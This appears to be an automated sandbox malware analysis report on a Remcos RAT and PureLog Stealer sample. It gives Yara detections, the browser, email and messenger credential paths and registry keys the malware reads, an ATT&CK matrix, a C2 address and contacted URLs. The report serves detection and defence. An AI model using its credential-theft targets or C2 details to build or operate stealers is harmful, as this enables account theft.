                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA4D
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB6B
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: \key3.db8_2_0040BB6B
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: ESMTPPassword17_2_004033F0
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                      Yara detected WebBrowserPassView password recovery tool
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 1148, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9YJump to behavior
                      Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-ZFXG9Y
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.7820000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: cmd.exe8_2_0040569A

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		12
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		1
                      Deobfuscate/Decode Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		1
                      Access Token Manipulation                      		4
                      Obfuscated Files or Information                      		2
                      Credentials in Registry                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Remote Access Software                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution                      		Login Hook1
                      Windows Service                      		22
                      Software Packing                      		3
                      Credentials In Files                      		3
                      File and Directory Discovery                      		Distributed Component Object Model211
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script422
                      Process Injection                      		1
                      Timestomp                      		LSA Secrets38
                      System Information Discovery                      		SSH3
                      Clipboard Data                      		12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		Cached Domain Credentials141
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Bypass User Account Control                      		DCSync41
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Masquerading                      		Proc Filesystem4
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Access Token Manipulation                      		Network Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd422
                      Process Injection                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569374 Sample: LdSbZG1iH6.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 61 geoplugin.net 2->61 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 14 other signatures 2->73 9 LdSbZG1iH6.exe 7 2->9         started        13 DGlxtFUfY.exe 5 2->13         started        signatures3 process4 file5 51 C:\Users\user\AppData\Roaming\DGlxtFUfY.exe, PE32 9->51 dropped 53 C:\Users\...\DGlxtFUfY.exe:Zone.Identifier, ASCII 9->53 dropped 55 C:\Users\user\AppData\Local\...\tmpD8DB.tmp, XML 9->55 dropped 57 C:\Users\user\AppData\...\LdSbZG1iH6.exe.log, ASCII 9->57 dropped 81 Contains functionality to bypass UAC (CMSTPLUA) 9->81 83 Contains functionalty to change the wallpaper 9->83 85 Contains functionality to steal Chrome passwords or cookies 9->85 93 7 other signatures 9->93 15 LdSbZG1iH6.exe 2 9->15         started        18 powershell.exe 23 9->18         started        20 powershell.exe 23 9->20         started        22 schtasks.exe 1 9->22         started        87 Multi AV Scanner detection for dropped file 13->87 89 Tries to steal Mail credentials (via file registry) 13->89 91 Machine Learning detection for dropped file 13->91 24 DGlxtFUfY.exe 13->24         started        28 schtasks.exe 13->28         started        signatures6 process7 dnsIp8 95 Writes to foreign memory regions 15->95 30 iexplore.exe 15->30         started        97 Loading BitLocker PowerShell Module 18->97 47 2 other processes 18->47 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        63 192.3.64.152, 2559, 49735, 49741 AS-COLOCROSSINGUS United States 24->63 65 geoplugin.net 178.237.33.50, 49736, 80 ATOM86-ASATOM86NL Netherlands 24->65 59 C:\ProgramData\remcos\logs.dat, data 24->59 dropped 99 Detected Remcos RAT 24->99 101 Maps a DLL or memory area into another process 24->101 103 Installs a global keyboard hook 24->103 36 DGlxtFUfY.exe 24->36         started        39 DGlxtFUfY.exe 24->39         started        41 DGlxtFUfY.exe 24->41         started        43 WerFault.exe 24->43         started        45 conhost.exe 28->45         started        file9 signatures10 process11 signatures12 75 Tries to steal Instant Messenger accounts or passwords 36->75 77 Tries to steal Mail credentials (via file / registry access) 36->77 79 Tries to harvest and steal browser information (history, passwords, etc) 39->79 49 WerFault.exe 41->49         started        process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      LdSbZG1iH6.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      LdSbZG1iH6.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\DGlxtFUfY.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\DGlxtFUfY.exe68%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
                      http://www.sakkal.com(;0%Avira URL Cloudsafe
                      https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
                      https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
                      https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe
                      https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
                      https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe
                      https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
                      https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d50%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://geoplugin.net/json.gpfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.fontbureau.com/designersGLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=WbhvD3AB.tmp.16.drfalse
                                  		high
                                  https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhvD3AB.tmp.16.drfalse
                                    		high
                                    http://www.fontbureau.com/designers?LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://aefd.nelreports.net/api/report?cat=bingthbhvD3AB.tmp.16.drfalse
                                        		high
                                        https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhvD3AB.tmp.16.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.nirsoft.netDGlxtFUfY.exe, 00000010.00000002.2263031169.0000000000794000.00000004.00000010.00020000.00000000.sdmpfalse
                                              		high
                                              https://aefd.nelreports.net/api/report?cat=bingaotakbhvD3AB.tmp.16.drfalse
                                                		high
                                                https://deff.nelreports.net/api/report?cat=msnbhvD3AB.tmp.16.drfalse
                                                  		high
                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&FrbhvD3AB.tmp.16.drfalse
                                                    		high
                                                    http://www.goodfont.co.krLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhvD3AB.tmp.16.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&FrbhvD3AB.tmp.16.drfalse
                                                        		high
                                                        https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhvD3AB.tmp.16.drfalse
                                                          		high
                                                          http://www.sajatypeworks.comLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.typography.netDLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhvD3AB.tmp.16.drfalse
                                                                  		high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://geoplugin.net/json.gp/CLdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, LdSbZG1iH6.exe, 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://maps.windows.com/windows-app-web-linkbhvD3AB.tmp.16.drfalse
                                                                        		high
                                                                        https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvD3AB.tmp.16.drfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaseLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.sakkal.com(;LdSbZG1iH6.exe, 00000000.00000002.1994602032.00000000058F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhvD3AB.tmp.16.drfalse
                                                                              		high
                                                                              https://login.yahoo.com/config/loginDGlxtFUfY.exefalse
                                                                                		high
                                                                                http://www.fonts.comLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sandoll.co.krLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.urwpp.deDPleaseLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.nirsoft.net/DGlxtFUfY.exe, 00000011.00000002.2259100532.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.zhongyicts.com.cnLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLdSbZG1iH6.exe, 00000000.00000002.1990255245.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, DGlxtFUfY.exe, 0000000A.00000002.2037378445.0000000002796000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.sakkal.comLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhvD3AB.tmp.16.drfalse
                                                                                                		high
                                                                                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhvD3AB.tmp.16.drfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhvD3AB.tmp.16.drfalse
                                                                                                  		high
                                                                                                  https://www.office.com/bhvD3AB.tmp.16.drfalse
                                                                                                    		high
                                                                                                    http://www.apache.org/licenses/LICENSE-2.0LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.fontbureau.comLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhvD3AB.tmp.16.drfalse
                                                                                                          		high
                                                                                                          https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhvD3AB.tmp.16.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhvD3AB.tmp.16.drfalse
                                                                                                            		high
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhvD3AB.tmp.16.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhvD3AB.tmp.16.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://aefd.nelreports.net/api/report?cat=wsbbhvD3AB.tmp.16.drfalse
                                                                                                              		high
                                                                                                              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhvD3AB.tmp.16.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://www.carterandcone.comlLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhvD3AB.tmp.16.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.fontbureau.com/designers/cabarga.htmlNLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.founder.com.cn/cnLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://www.fontbureau.com/designers/frere-user.htmlLdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhvD3AB.tmp.16.drfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhvD3AB.tmp.16.drfalse
                                                                                                                          		high
                                                                                                                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhvD3AB.tmp.16.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.jiyu-kobo.co.jp/LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.fontbureau.com/designers8LdSbZG1iH6.exe, 00000000.00000002.1994786821.0000000006F92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhvD3AB.tmp.16.drfalse
                                                                                                                                		high
                                                                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhvD3AB.tmp.16.drfalse
                                                                                                                                  		high
                                                                                                                                  https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhvD3AB.tmp.16.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.google.com/accounts/serviceloginDGlxtFUfY.exefalse
                                                                                                                                      		high
                                                                                                                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhvD3AB.tmp.16.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhvD3AB.tmp.16.drfalse
                                                                                                                                        		high
                                                                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhvD3AB.tmp.16.drfalse
                                                                                                                                          		high
                                                                                                                                          http://geoplugin.net/json.gpafDGlxtFUfY.exe, 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhvD3AB.tmp.16.drfalse
                                                                                                                                              		high

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
